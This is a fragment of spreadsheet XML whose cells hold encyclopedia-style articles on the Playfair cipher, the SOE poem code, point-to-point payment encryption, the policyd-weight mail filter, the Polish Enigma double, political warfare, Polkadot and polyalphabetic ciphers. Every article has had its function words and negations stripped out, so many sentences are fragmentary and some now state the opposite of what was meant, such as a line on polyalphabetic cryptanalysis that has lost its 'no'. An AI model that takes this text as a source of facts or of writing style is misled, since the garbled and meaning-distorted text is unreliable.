repeat transformation returns selection original state. first rule reversed dropping extra instances chosen insert letter generally "x"s "q"s make sense final message finished. there several minor variations original playfair cipher. example using "playfair example" (assuming interchangeable), table becomes (omitted letters red): first step encrypting message "hide gold tree stump" convert pairs letters (with null used separate repeated "e"s). then: thus message "hide gold tree stump" becomes if", restructured "bmodz bxdna bekud muixm mouvi ease reading cipher text. clarification picture assume wants encrypt digram there five general cases: cryptanalysis like classical ciphers, playfair cipher easily cracked enough text. obtaining relatively straightforward plaintext ciphertext known. when ciphertext known, brute force cryptanalysis cipher involves searching space matches frequency occurrence digrams (pairs letters) known frequency occurrence digrams assumed language original message.cryptanalysis playfair similar four-square two-square ciphers, though relative simplicity playfair system makes identifying candidate plaintext strings easier. most notably, playfair digraph reverse (e.g. decrypt letter pattern plaintext (e.g. er). english, many words contain reversed digraphs receiver departed. identifying nearby reversed digraphs ciphertext matching pattern list known plaintext words containing pattern easy generate possible plaintext strings begin constructing key. different approach tackling playfair cipher shotgun hill climbing method. this starts random square letters. then minor changes introduced (i.e. switching letters, rows, reflecting entire square) candidate plaintext like standard plaintext change (perhaps comparing digrams known frequency chart). square deemed improvement, adopted mutated find even better candidate. eventually, plaintext something close found achieve maximal score whatever grading method chosen. this obviously beyond range typical human patience, computers adopt algorithm crack playfair ciphers relatively small amount text. another aspect playfair separates four-square two-square ciphers fact never contain double-letter digram, e.g. double letter digrams ciphertext length message long enough make statistically significant, likely method encryption playfair. good tutorial reconstructing playfair cipher found chapter "solution polygraphic substitution systems," field manual 34-40-2, produced united states army. another cryptanalysis playfair cipher found chapter helen fouché gaines, cryptanalysis study ciphers solutions.a detailed cryptanalysis playfair undertaken chapter dorothy sayers' mystery novel have carcase. story, playfair message demonstrated cryptographically weak, detective able solve entire making guesses formatting message case, message starts name city date). sayers' book includes detailed description mechanics playfair encryption, well step-by-step account manual cryptanalysis. german army, force police used double playfair cipher medium-grade cipher wwii, based british playfair cipher broken early wwi. they adapted introducing second square second letter bigram selected, dispensed keyword, placing letters random order. german fondness forma messages, broken bletchley park. messages preceded sequential number, numbers spelled out. german numbers (eins) twelve (zwölf) contain eight letters double playfair squares, forma traffic relatively easy break (smith, page 74-75) modern crosswords advanced thematic cryptic crosswords like listener crossword (published saturday edition british newspaper times) occasionally incorporate playfair ciphers. normally four answers entered grid code, playfair keyphrase thematically significant final solution. cipher lends well crossword puzzles, plaintext found solving clues, ciphertext found solving others. solvers construct table pairing digrams sometimes possible guess keyword, never necessary). playfair cipher generally explained part preamble crossword. this levels playing field solvers come across cipher previously. cipher used always same. 25-letter alphabet used always contains coinciding. table always filled row. popular culture novel have carcase dorothy sayers gives blow-by-blow account cracking playfair cipher. world thriller trojan horse hammond innes conceals formula high-strength metal alloy using playfair cipher. film national treasure: book secrets, treasure hunt clue encoded playfair cipher. audio book rogue angel thunder, playfair cipher clue used send anja creed venice. novel york: stars (part three trilogy children) laura ruby, clue solving morningstarr cipher encrypted using playfair cipher. playfair cipher serves plot device season episode 2019 batwoman series). also topics cryptography notes references gaines, helen fouché (1956) [1939], cryptanalysis study ciphers solutions, dover, isbn 0-486-20097-3 smith, michael station codebreakers bletchley park (1998, channel books/macmillan, london) isbn 0-7522-2189-2 kahn, david (1996), codebreakers: comprehensive history secret communication ancient times internet, scribner, isbn 978-0684831305 external links online encrypting decrypting playfair javascript extract lecture notes ciphers digraphic ciphers: playfair playfair cypher cross platform implementation playfair cipher javascript implementation playfair cipher python streamlit implementation playfair cipher</t>
  </si>
  <si>
    <t>Poem code</t>
  </si>
  <si>
    <t>poem code simple, insecure, cryptographic method used world british special operations executive (soe) communicate agents nazi-occupied europe. method works sender receiver pre-arranging poem use. sender chooses number words random poem gives letter chosen words number. numbers used transposition cipher conceal plaintext message. cipher used often double transposition. indicate receiver words chosen, indicator group letters sent start message. description encrypt message, agent would select words poem key. every poem code message commenced indicator group five letters, whose position alphabet indicated five words agent's poem would used encrypt message. instance, suppose poem first stanza jabberwocky: ’twas brillig, slithy toves gyre gimble wabe: mimsy borogoves, mome raths outgrabe. could select five words wabe toves twas mome, positions poem, describe corresponding indicator group dmfau. five words written sequentially, letters numbered create transposition encrypt message. numbering proceeds first numbering five words starting continuing b's, c's, absent letters simply skipped. example wabe toves twas mome, numbered numbered d's; four numbered g's; numbered alphabet. this results transposition this defines permutation used encryption. first, plaintext message written rows grid many columns transposition long. then columns read order given transposition key. example, plaintext "the operation demolish bunker tomorrow eleven rendezvous farmer jacques" would written grid paper, along transposition numbers, like this: columns would read order specified transposition numbers: pela dozc ebet etti ruvf oree ioax hhas moou lrss tknr orue ninr emvq tswt anea tsdj ierm ohex otea indicator group (dmfau) would prepended, resulting ciphertext: dmfau pelad ozceb etett iruvf oreei oaxhh asmoo ulrss tknro rueni nremv qtswt aneat sdjie rmohe xotea uses code poems, process selecting indicator group transposing text would repeated (double transposition) scramble letters. additional security measure, agent would prearranged errors text security checks. example, might intentional error every 18th letter ensure that, agent captured poem found, enemy might transmit without security checks. analysis code's advantage provide relatively strong security requiring codebook. however, encryption process error-prone done hand, security reasons, messages least words long. security check usually effective: code used intercepted decoded enemy, security checks revealed. further, security check could often tortured agent. there number weaknesses because poem re-used, message broken means (including threat, torture, even cryptanalysis), past future messages readable. agent used poem code words send number similar messages, words could discovered easily enemy cryptographers. words could identified coming famous poem quotation, future traffic submitted poem code could read. german cryptologic units successful decoding many poems searching collections poems. since poems used must memorable ease agent, temptation well-known poems poems well-known poets, weakening encryption (e.g., agents often used verses shakespeare, racine, tennyson, molière, keats, etc.). development when marks appointed codes officer special operations executive (soe) london world quickly recognized weakness technique, consequent damage agents organizations continent, began press changes. eventually, began using original compositions (thus published collection poems poet) give added protection (see life that have, example). frequently, poems humorous overtly sexual make memorable ("is gaulle's prick//twelve inches thick//can rise//to size//of proud flag-pole//and shine//from arse-hole?"). another improvement poem message, poem written fabric rather memorized. gradually replaced poem code secure methods. worked-out keys (woks) first major improvement invention marks. woks pre-arranged transposition keys given agents made poem unnecessary. each message would encrypted key, written special silk. disposed tearing piece silk, message sent. project marks, named "operation gift-horse", deception scheme aimed disguise secure code traffic poem code traffic, german cryptographers would think "gift-horsed" messages easier break actually were. this done adding false duplicate indicator groups wok-keys, give appearance agent repeated certain words code poem. gift horse waste enemy's time, deployed prior d-day, code traffic increased dramatically. poem code ultimately replaced one-time pad, specifically letter one-time (lop). lop, agent provided string letters substitution square. plaintext written string pad. pairs letters column (such p,l) indicated unique letter square (q). never reused substitution square could reused without loss security. this enabled rapid secure encoding messages. bibliography between silk cyanide marks, harpercollins (1998) isbn 0-00-255944-7; marks head codes book account struggle introduce better encryption field agents; contains previously unpublished code poems marks, well descriptions used whom. also book cipher life that have (also known yours, arguably famous code poem)</t>
  </si>
  <si>
    <t>Point-to-point encryption</t>
  </si>
  <si>
    <t>point-to-point encryption (p2pe) standard established security standards council. payment solutions offer similar encryption meet p2pe standard referred end-to-end encryption (e2ee) solutions. objective p2pe e2ee provide payment security solution instantaneously converts confidential payment card (credit debit card) data information indecipherable code time card swiped, order prevent hacking fraud. designed maximize security payment card transactions increasingly complex regulatory environment. standard p2pe standard defines requirements "solution" must meet order accepted pci-validated p2pe solution. "solution" complete hardware, software, gateway, decryption, device handling, etc. only "solutions" validated; individual pieces hardware card readers cannot validated. also common mistake refer p2pe validated solutions "certified"; certification. determination whether solution meets p2pe standard responsibility p2pe qualified security assessor (p2pe-qsa). p2pe-qsa companies independent third-party companies employ assessors security standards council's requirements education experience, passed requisite exam. security standards council validate solutions. works payment card swiped card reading device, referred point interaction (poi) device, merchant location point sale, device immediately encrypts card information. device part pci-validated p2pe solution uses algorithmic calculation encrypt confidential payment card data. from poi, encrypted, indecipherable codes sent payment gateway processor decryption. keys encryption decryption never available merchant, making card data entirely invisible retailer. once encrypted codes within secure data zone payment processor, codes decrypted original card numbers passed issuing bank authorization. bank either approves rejects transaction, depending upon card holder's payment account status. merchant notified payment accepted rejected complete process along token merchant store. this token unique number reference original transaction merchant ever needed perform research refund customer without ever knowing customer's card information (tokenization). there also qualified integrator reseller (qir) companies, businesses authorized "implement, configure, and/or support validated" pa-dss payment applications, perform qualified installations. solution providers according security standards council:the p2pe solution provider third-party entity (for example, processor, acquirer, payment gateway) overall responsibility design implementation specific p2pe solution, manages p2pe solutions merchant customers. solution provider overall responsibility ensuring p2pe requirements met, including p2pe requirements performed third-party organizations behalf solution provider (for example, certification authorities key-injection facilities). benefits customer benefits p2pe significantly reduces risk payment card fraud instantaneously encrypting confidential cardholder data moment payment card swiped "dipped" chip card card reading device (payment terminal) poi. merchant benefits p2pe significantly facilitates merchant responsibilities: with p2pe validated solution, merchants save significant time money requirements greatly reduced. payment card industry data security standard (pci dss). organizations p2pe validated solution provider, self assessment questionnaire reduced sections sections controls reduced questions event fraud, p2pe solution provider, merchant, held accountable data loss resulting fines assessed card brands (american express, visa, mastercard, discover, jcb). security standards council assess penalties solution providers merchants. payment process p2pe quicker transaction processes, thus creating simpler faster customer–merchant transactions. point-to-point encryption versus end-to-end encryption point-to-point point-to-point connection directly links system (the point payment card acceptance) system (the point payment processing). true p2pe solution determined three main factors: solution uses hardware-to-hardware encryption decryption process along device sred (secure reading exchange data) listed function. solution validated p2pe standard includes specific device requirements strict controls regarding shipping, receiving, tamper-evident packaging, installation. solution includes merchant education form p2pe instruction manual, guides merchant device use, storage, return repairs, regular reporting. end-to-end end-to-end encryption name suggests advantage p2pe card details unencrypted endpoints. endpoints validated acquirer, opportunity card details intercepted. obviously important endpoints (the gateway) provided accredited organisations. point-to-point encryption requirements requirements include: secure encryption payment card data point interaction (poi), p2pe validated application(s) point interaction, secure management encryption decryption devices, management decryption environment decrypted account data, secure encryption methodologies cryptographic operations, including generation, distribution, loading/injection, administration, usage. references</t>
  </si>
  <si>
    <t>Policyd-weight</t>
  </si>
  <si>
    <t>policyd-weight mail filter postfix mail transfer agent (mta) written perl. allows postfix evaluate mail envelope information score mail several dns-based blackhole lists (dnsbl) mail queued. final score determine whether mail rejected accepted, case usually subject resource intensive checks virus scanner spam filter. features policyd-weight works policy daemon postfix. uses dnsbl, rhsbl, queries envelope sender helo smtp arguments evaluate possibility either forgery spam. rejection happens based overall score, single blacklist entry cause mail rejected. score determined various checks linear. administrator able adjust scores check meet requirements. policyd-weight caches frequent queries minimize bandwidth usage. benefit approach able reject delivery attempt body (data) mail received (unlike installations spamassassin amavis), thus saving network bandwidth. also delays like greylisting keeps clients fake helo sender information better accuracy fewer false positives sender policy framework (spf) checks (example: blocked forwarders inconsistent spf-records passed spam/phishing spam/phishing-domains consistent spf-records set). message flow please refer drawing. licensing policyd-weight free software, licensed released general public license also postfix smtp access policy delegation postfix add-on software further reading isbn 978-3-937514-50-5, heinlein: postfix-buch, sect. external links policyd-weight repository freebsd ports mailinglist archive</t>
  </si>
  <si>
    <t>Polish Enigma double</t>
  </si>
  <si>
    <t>polish enigma "double" machine produced polish cipher bureau replicated german enigma rotor cipher machine. enigma double result marian rejewski's remarkable achievement determining wiring enigma's rotors reflectors. first double polish cipher bureau recognized germans using cipher. germans mistakenly shipped cipher machine poland; attempts recover shipment raised suspicions polish customs, polish cipher bureau learned germans using enigma machine. bureau purchased commercial enigma machine, attempted failed break cipher. december 1932, polish cipher bureau tasked marian rejewski breaking enigma cipher machine. french obtained material enigma, french provided material polish cipher bureau. time, commercial enigma extended plugboard. rejewski made rapid progress able determine wiring military enigma. bureau modified commercial enigma rotors, reflector, internal wiring match military enigma. commercial enigma plugboard, plugboard could simulated relabeling keys lamps. result first enigma double. february 1933, polish cipher bureau ordered fifteen "doubles" military enigma machine radio manufacturing company, warsaw. ultimately, seventy functional replicas produced. precious gift august 1939, following tripartite meeting french, british, polish cryptologists held near warsaw july, enigma replicas passed poland's allies, sent paris london. until then, german military enigma traffic defeated british french, faced disturbing prospect german communications would remain "black" duration coming war. french doubles after germany invaded poland september 1939 polish cipher bureau personnel evacuated france, cipher bureau resumed interrupted work bruno, outside paris. poles three replica enigma machines work with, wearing round-the-clock use. french army intelligence officer gustave bertrand ordered parts forty machines french precision-mechanics firm. manufacture proceeded sluggishly, however, fall france opening underground work southern france's free zone october 1940 four machines finally assembled. also saxon palace (polish: pałac saski), warsaw, german enigma ciphers first broken december 1932 notes references brzezinski, zbigniew (2005). "the unknown victors". marian rejewski, 1905-1980: living enigma secret. bydgoszcz: bydgoszcz city council. 15–18. isbn 83-7208-117-4. oclc 62701914. kozaczuk, władysław (1984). enigma: german machine cipher broken, read allies world two. foreign intelligence book series. edited translated christopher kasparek. frederick, maryland: university publications america. isbn 0-89093-547-5. oclc 9826775. woytak, richard (january 1982). transcribed translated christopher kasparek. conversation marian rejewski". cryptologia. (1): 50–60. doi:10.1080/0161-118291856830. external links slawo wesolkowski, "the invention enigma polish broke before start wwii" http://www.cryptomuseum.com/crypto/enigma/hist.htm picture enigma double (http://www.cryptomuseum.com/crypto/enigma/polish/img/polish_enigma_1.jpg) http://www.codesandciphers.org.uk/virtualbp/poles/poles.htm picture enigma double</t>
  </si>
  <si>
    <t>Political warfare</t>
  </si>
  <si>
    <t>political warfare political means compel opponent one's will, based hostile intent. term political describes calculated interaction government target audience, including another state's government, military, and/or general population. governments variety techniques coerce certain actions, thereby gaining relative advantage opponent. techniques include propaganda psychological operations ("psyops"), service national military objectives respectively. propaganda many aspects hostile coercive political purpose. psychological operations strategic tactical military objectives intended hostile military civilian populations.political warfare's coercive nature leads weakening destroying opponent's political, social, societal will, forcing course action favorable state's interest. political combined violence, economic pressure, subversion, diplomacy, chief aspect "the words, images ideas". creation, deployment, continuation coercive methods function statecraft nations serve potential substitute direct military action. instance, methods like economic sanctions embargoes intended inflict necessary economic damage force political change. utilized methods techniques political depend state's political vision composition. conduct differ according whether state totalitarian, authoritative, democratic.the ultimate goal political warfare alter opponent's opinions actions favour state's interests without utilizing military power. this type organized persuasion coercion also practical purpose saving lives eschewing violence order political goals. thus, political warfare also involves "the heartening friends disheartening enemies, gaining help one's cause causing abandonment enemies'". generally, political warfare distinguished hostile intent potential escalation; loss life accepted consequence. tools peaceful political warfare utilizes instruments short available nation achieve national objectives. best tool political warfare "effective policy forcefully explained", directly, "overt policy forcefully backed". political warfare used, leading thinker topic explained, "when public relations statements gentle, public diplomacy-style persuasion policies 'soft power' fail needed sentiments actions" around world. major political warfare waged propaganda. essence operations either overt covert. "white" overt propaganda comes known source. "gray" propaganda, hand, "semiofficial amplification government's voice". radio free europe radio liberty examples "gray" propaganda cold war. "black" propaganda, however, propaganda originates unknown source. black propaganda fact often "appears come disinterested source fact not".there channels used transmit propaganda. sophisticated technology allows organization disseminate information vast number people. basic channel spoken word. this include live speeches radio television broadcasts. overt covert radio broadcasting especially useful tool. printed word also powerful, including pamphlets, leaflets, books, magazines, political cartoons, planted newspaper articles (clandestine otherwise). subversion, agents influence, spies, journalists, "useful idiots" used powerful tools political warfare. aggressive political warfare also includes aggressive activities actor offensively gain relative advantage control another. between nation states, seizure power open assimilation victimized state political system power complex aggressor. this aggressor-victim relationship also seen rivals within state involve tactics like assassination, paramilitary activity, sabotage, coup d'état, insurgency, revolution, guerrilla warfare, civil war. foreign infiltration liberation occurs government overthrown foreign military diplomatic intervention, covert means. campaign's ultimate purpose gain control another nation's political social structure. campaign could aggressor's national forces political faction favorable aggressor within state. paul blackstock describes three stages involved extension control aggressor victim:penetration infiltration: deliberate infiltration political social groups within victim state aggressor ultimate purpose extending influence control. aggressor conceals endgame, goes beyond normal influential nature diplomacy involves espionage. forced disintegration atomization: breakdown political social structure victim fabric national morale disintegrates state unable resist intervention". aggressor exploit inevitable internal tensions political, class, ethnic, religious, racial, groups. this concept similar strategy 'divide conquer'. subversion defection: subversion "undermining detachment loyalties significant political social groups within victimized state, transference political ideological causes aggressor". lieu total direct transference, aggressor accept intermediate states still meets objectives, favor politically significant individuals. furthermore, formation counter-elite, made influential individuals leaders, within victim state establishes legitimacy permanency regime. defection transference allegiance individuals leaders aggressor's camp. individual could relocate stay-in-place victim country, continually influencing local issues events aggressor's favor. defectors also provide insider information aggressor.coup d'état overthrowing government infiltration political, military, social groups small segment state apparatus. small segment exists within state targets critical political levers power within government neutralize opposition coup post-coup governing force. several pre-existing factors necessary coup: political participation limited small portion population, independence foreign power influence control, power decision-making authority concentrated within political center diffused regional authorities, businesses, groups.a coup utilizes political resources gain support within existing state neutralize immobilize capable rallying coup. successful coup occurs rapidly taking government, stabilizes situation controlling communications mobility. furthermore, government must gain acceptance public military administrative structures, reducing sense insecurity. ultimately, government seek legitimacy eyes people well seek foreign recognition. coup d'état national forces involve foreign influence, similar foreign liberation infiltration. paramilitary operations: transitional political warfare ranging small-scale violence primitive organizational structure (e.g. sabotage) full-scale conventional war. transition escalation includes series stages depends tactical strategic objectives. paramilitary activities include infiltration subversion well small group operations, insurrection, civil war. insurgency: organized, protracted political warfare tool designed weaken control eliminate legitimacy established government, occupying power, political authority. insurgency internal conflict, primary struggle mobilize local populations political control gain popular support towards insurgents' cause. insurgencies include political military objectives, goal establishing legitimate, rival state structure. insurgencies unconventional military conflicts incorporate variety methods, ranging coercive tools like intimidation assassination, political tools like propaganda social services. insurgency's approaches objectives could involve perpetual disorder violence demonstrating government's inability provide security populace, weakening government killing intimidating effective opposition government, intimidating population discouraging participation support political legal processes, controlling intimidating police military forces (which limits ability respond insurgent attacks) creating government repression provoking over-reactions security military forces. antiquity history political warfare traced antiquity. chinese general strategist captures essence ancient chinese military strategy book, war: hundred victories hundred battles highest excellence; highest excellence subdue enemy's army without fighting all...the expert using military subdues enemy's forces without going battle, takes enemy's walled cities without launching attack, crushes enemy's state without protracted war."there abundant examples political warfare antiquity. ancient greece, famous example trojan horse, used deception tactical military objectives. propaganda commonly utilized, including greek rhetoric theatre used words images influence populations throughout hellenic world. this practice left lasting legacy speech mechanism political power, greater force solving disputes inducing submission. during period, alexander great used coinage imprinted image, indirectly forcing conquered nations accept legitimacy national ruler unite disparate nations together dominion.ancient rome utilized similar political warfare greeks including rhetoric, displayed cicero; art, seen coinage, statues, architecture, engineering, mosaics. elements intended portray rome's imperial dominance subject nations superior nature roman society. following religious vision, emperor constantine bound roman state universal christian church. linked "religious commitment imperial ambition" proved quite successful powerful. long-lasting symbol rho, forms first letters greeks' name christ. this symbol used thousand years constantine's successors symbol "imperial majesty divine authority" still powerful symbol within christianity. country china china's political leaders century first create nation could proceed contend national actors international arena. consequently, insofar chinese communist party kuomintang subscribed political warfare concept formative years struggle, concept much concerned creating national identity defeating domestic adversaries china's ability compete world. since founding 1949 centered much political warfare efforts within united front work department. chinese conception political warfare includes "three warfares" public opinion warfare, psychological warfare, legal warfare, among others.taiwan remains major target political warfare efforts. china's political warfare campaign aims isolate taiwan international community interfere taiwan's democratic system institutions. soviet union russia throughout cold war, soviet union committed political warfare classic totalitarian lines continued utilize propaganda towards internal external audiences. "active measures" (russian: активные мероприятия) russian term describe political warfare activities home abroad support soviet domestic foreign policy. soviet efforts took many forms, ranging propaganda, forgeries, general disinformation assassinations. measures aimed damage enemy's image, create confusion, mould public opinion, exploit existing strains international relations. soviet union dedicated vast resources attention active measures, believing "mass production active measures would significant cumulative effect period several decades". soviet active measures notorious targeting intended audience's public attitudes, include prejudices, beliefs, suspicions deeply rooted local history. soviet campaigns disinformation psychologically consistent audience. examples soviet active measures include: operation trust: counterintelligence operation conducted soviet intelligence domestic foreign adversaries. operation, 1921 1929, fake anti-bolshevik underground organization, "monarchist union central russia", mucr (монархическое объединение центральной россии, моцр), claimed plan conspiracy overthrow soviet government. trust aimed create view communism russia soviet union would abandon revolutionary ways. western intelligence services supported fake anti-bolshevik dissidents provided false intelligence reports. operation's purpose identify real dissidents anti-bolsheviks, internally abroad. operation resulted arrests executions russian exile leaders general demoralization anti-soviet efforts. "rumor" campaign: october 1985, soviet weekly literaturnaya gazeta drew attention story obscure indian paper, patriot, alleged government engineered aids virus biological warfare research u.s., spread throughout world u.s. servicemen used guinea pigs experiment. story broadcast moscow's radio peace progress english turkish broadcasts asian countries, important u.s. military bases. "rumor" campaign highly effective 1980s continues resurface today throughout world.communist strategy tactics continually focused revolutionary objectives, "for real political warfare waged daily guise peace". purpose "disorient disarm opposition...to induce desire surrender opposing peoples...to corrode entire moral, political, economic infrastructure nation". lenin's mastery "politics struggle", remained objectives soviet union global communist regimes, people's republic china. soviet political warfare afghanistan soviet union remains comprehensive example aggressive nation expanded empire covert infiltration direct military involvement. following world soviet union believed european economies would disintegrate, leaving social economic chaos allowing soviet expansion territories. soviets quickly deployed organizational weapons non-political front groups, sponsored 'spontaneous' mass appeals, puppet politicians. while many countries' political social structures post-war disarray, soviet union's proxy communist parties well-organized able take control weak, newly formed eastern european governments. moreover, clandestine operations soviet intelligence services occupying forces soviet military infiltrated political social spheres satellites. conversely, 1979, soviet union unable successfully penetrate afghan society supporting coup brought marxist government power. while soviet units already kabul, afghanistan time coup, additional soviet troops arrived reinforce units seize important provincial cities, bringing total soviet troops inside afghanistan 125,000–140,000. soviets unprepared afghan resistance included classic guerrilla tactics foreign support. 1989, soviet forces withdrew afghanistan, unable infiltrate afghan society immobilize resistance. taiwan republic china government taiwan recognized communist adversary astutely employed political warfare capitalize upon kuomintang weaknesses years since yat-sen first mounted revolution 1920s, chiang kai-shek's regime come embrace political warfare philosophy defensive necessity best foundation consolidating power hope optimistic goal "retaking mainland". both nationalist communist chinese political warfare doctrines stem historical antecedents whampoa military academy 1924 soviet tutelage.the nationalist chinese experience political warfare treated much tangible merely tracing doctrinal development. taiwan 1970s, concept virtually synonymous general political warfare department ministry national defense, authored political doctrine culmination series organizational manifestations application.in 21st century political warfare primarily responsibility political warfare bureau. united states creation political warfare capacity american foreign policy demonstrates tendency move towards political warfare times tension perceived threat, toward public diplomacy times improved relations peace. american political warfare depends central political vision world subsequent foreign policy objectives. after world threat soviet expansion brought aims american political warfare: restore western europe military, economic, political support weaken soviet hold eastern europe propagandapresident harry truman established government political warfare capability national security 1947. created u.s. national security council, became infrastructure necessary apply military power political purposes. additionally, united states crafted marshall plan, provided funding rebuild, 1947 1951, european countries devastated war. president truman voiced united states' national, universalist vision political warfare soviet union address congress march 1947, thereby establishing truman doctrine: peoples number countries world recently totalitarian regimes forced upon will. government united states made frequent protests coercion intimidation, violation yalta agreement, poland, rumania, bulgaria. must also state number countries similar developments. life based upon majority, distinguished free institutions, representative government, free elections, guarantees individual liberty, freedom speech religion, freedom political oppression. second life based upon minority forcibly imposed upon majority. relies upon terror oppression, controlled press radio; fixed elections, suppression personal freedoms. believe must policy united states support free peoples resisting attempted subjugation armed minorities outside pressures. believe must assist free peoples work destinies way. believe help primarily economic financial essential economic stability orderly political processes. seeds totalitarian regimes nurtured misery want. they spread grow evil soil poverty strife. they reach full growth hope people better life died. must keep hope alive. free peoples world look support maintaining freedoms. falter leadership, endanger peace world shall surely endanger welfare nation. containment policy truman doctrine post-wwii basis american political warfare operations united states government went formulate active, defensive strategy contain soviet threat. 1948, george kennan, father containment policy, wrote policy planning staff memorandum titled "the inauguration organized political warfare". this national security council (nsc) memo established directorate political warfare operations, control nsc, known consultative evaluation) board national security council. this directorate fell authority secretary state, board complete authority covert political operations. recognized political warfare instrument united states' grand strategy. kennan defined 'political warfare' "the employment means nation's command, short war, achieve national objectives. such actions overt covert. they range overt actions political alliances, economic measures (such marshall plan), 'white' propaganda covert operations clandestine support 'friendly' foreign elements, 'black' psychological warfare even encouragement underground resistance hostile states."the memo defined four projects activated board combat growing communist influence abroad, including: liberation committees: encourage formation public american organization sponsor selected political refugee committees give support guidance national movements gestating soviet world; support indigenous anti-communist elements: within threatened countries free world, include covertly using private intermediaries; underground activities behind iron curtain preventive direct action free countries: cases dire necessity. this covert operation involved: control anti-sabotage activities venezuelan fields, american sabotage near eastern installations verge soviet capture, designation individuals threatened kremlin protected removed elsewhere. cold united states used gray black propaganda research, broadcasting, print media operations cold achieve political warfare goals. these operations conducted eastern european targets western europe public-private organizations supported partly central intelligence agency nsc, partly private corporations. these organizations free europe, launched 1941 targeted eastern europe, american committee liberation (amcomlib) created 1951 broadcast information soviet russia. both renamed shortly thereafter combined radio free europe/radio liberty (rfe/rl). many rfe/rl recruits came either european emigrants families strongly anti-communist government agencies, notably cia. officially, "the government denied responsibility radios took care conceal channels funding, personnel recruitment, policy influence. obviously, major support american, plausibly official american could excluded diplomatic intercourse international legal complication." rfe/rl considered gray operation existence publicly acknowledged "activists" united states late 1960s. goal radios present truth suppressed peoples behind iron curtain rebuilding lively diversified intellectual life europe could defeat soviet incursions freedom".in addition, voice america (voa) started broadcasting soviet citizens 1947 pretext countering "more harmful instances soviet propaganda directed american leaders policies" part internal soviet russian-language media. soviet union responded initiating electronic jamming broadcasts april 1949.in fall 1950 group scholars including physicists, historians psychologists harvard university, massachusetts institute technology rand corporation undertook research study psychological warfare department state. project troy report secretary state, presented secretary state february 1951, made various proposals political warfare, including possible methods minimizing effects soviet jamming voice america broadcasts. assumed truman administration tried implement plans established project troy project overload delay. purpose latter break stalinist system increasing number input points system creating complex unpredictable situations requiring action.an overt, non-governmental form political warfare cold emerged president ronald reagan's june 1982 speech british parliament. speech, reagan appealed "global crusade democracy" result, national endowment democracy (ned) created december 1983. non-governmental organization (ngo) based four fundamental foundations: national democratic institute national republican institute dispense funds training politicians political parties; center international private enterprise provide training, funding networking opportunities business associations; afl–cio assist foreign trade unions.the "funded programs support candidates acceptable elections grenada, panama, salvador, guatemala throughout 1984 1985 order prevent communist victories, create stable pro-us governments". also active europe, funding groups carry promote pro-north atlantic treaty organization (nato) propaganda britain, well "right wing french student organisation linked fascist paramilitaries". other notable efforts included anti-sandinista propaganda opposition efforts nicaragua well anti-communist propaganda opposition efforts support solidarity movement poland 1984 1990. according 1991 interview washington post creators ned, allen weinstein, (ned) today done covertly years cia". also references further reading bernays, edward. "propaganda" publishing, 1928). lawrence bielenson, "power through subversion" (public affairs press, 1972). ellul, jacques. "propaganda: formation men's attitudes". trans. konrad kellen jean lerner. (random house/vintage, 1973). linebarger, paul "psychological warfare". (international propaganda communications, 1948). carnes lord frank barnett, eds., "political warfare psychological operations: rethinking approach" (national defense university press national strategy information center, 1989). luttwak, edward. "coup d'état: practical handbook" (harvard university press, 1968). janos radvanyi, ed., "psychological operations political warfare long-term strategic planning" (praeger, 1990). smith, paul political war" (national defense university press publications, 1989).</t>
  </si>
  <si>
    <t>Polkadot (cryptocurrency)</t>
  </si>
  <si>
    <t>polkadot open source blockchain platform cryptocurrency. provides interconnectivity interoperability blockchains, enabling independent chains securely exchange messages perform transactions without trusted third-party. this allows cross-chain transfers data assets, different blockchains, cross-chain dapps (decentralized applications) built using polkadot network.the polkadot network primary blockchain named "relay chain" many user-created parallel chains called "parachains". relay chain acts governance layer network, parachains auctioned, enabling independent projects create operate blockchains live within polkadot infrastructure benefit security.the protocol created ethereum co-founder gavin wood, raised $144.3 million initial coin offering october 2017.the network uses proof stake consensus algorithm. protocol used, blind assignment blockchain extension (babe), derived ouroboros. protocol adapted ethereum co-founder gavin wood developed web3 foundation initial implementation parity technologies.polkadot's genesis block release 2020. some well-known blockchain protocols, including melonport, already expressed interest developing polkadot parachain. protocol general description polkadot protocol intended scalable multichain technology. unlike usual blockchain implementations, centered around single blockchain various degrees generalization depending applications, polkadot provides primary chain (relay-chain), host large number validatable globally consistent data structures (parachains). token (dot) native token, dots released upon launch polkadot genesis block. references</t>
  </si>
  <si>
    <t>Polyalphabetic cipher</t>
  </si>
  <si>
    <t>polyalphabetic cipher cipher based substitution, using multiple substitution alphabets. vigenère cipher probably best-known example polyalphabetic cipher, though simplified special case. enigma machine complex still fundamentally polyalphabetic substitution cipher. history work al-qalqashandi (1355–1418), based earlier work al-durayhim (1312–1359), contained first published discussion substitution transposition ciphers, well first description polyalphabetic cipher, plaintext letter assigned substitute. however, claimed polyalphabetic ciphers developed arab cryptologist kindi (801–873) centuries earlier.the alberti cipher leon battista alberti around 1467 early polyalphabetic cipher. alberti used mixed alphabet encrypt message, whenever wanted would switch different alphabet, indicating done including uppercase letter number cryptogram. encipherment alberti used decoder device, cipher disk, implemented polyalphabetic substitution mixed alphabets. johannes trithemius—in book polygraphiae libri (six books polygraphia), published 1518 death—invented progressive polyalphabetic cipher called trithemius cipher. unlike alberti's cipher, switched alphabets random intervals, trithemius switched alphabets letter message. started tabula recta, square letters (although trithemius, writing latin, used letters). each alphabet shifted letter left started reaching (see table). trithemius's idea encipher first letter message using first shifted alphabet, became became etc. second letter message enciphered using second shifted alphabet, etc. alberti's cipher disk implemented scheme. alphabets, fixed outer ring, rotating disk. letter enciphered looking letter outer ring, encoding letter underneath disk. disk started underneath user rotated disk letter encrypting letter. cipher trivial break, alberti's machine implementation much difficult. progression cases poorly concealed attackers. even alberti's implementation polyalphabetic cipher rather easy break (the capitalized letter major clue cryptanalyst). next several hundred years, significance using multiple substitution alphabets missed almost everyone. polyalphabetic substitution cipher designers seem concentrated obscuring choice alphabets (repeating needed), increased security possible using many never repeating any. principle (particularly alberti's unlimited additional substitution alphabets) major advance—the significant several hundred years since frequency analysis developed. reasonable implementation would (and, finally achieved, was) vastly harder break. mid-19th century babbage's secret work crimean friedrich kasiski's generally equivalent public disclosure years later), cryptanalysis well-implemented polyalphabetic ciphers anywhere all. kasiski examination. notes references alberti, leon battista (1997), treatise ciphers, trans. zaccagnini. foreword david kahn, torino: galimberti churchhouse, robert (2002), codes ciphers: julius caesar, enigma internet, cambridge: cambridge university press, isbn 978-0-521-00890-7 gaines, helen fouché (1939), cryptanalysis, dover, isbn 0-486-20097-3 also vigenère cipher topics cryptography</t>
  </si>
  <si>
    <t>Prosperity certificate</t>
  </si>
  <si>
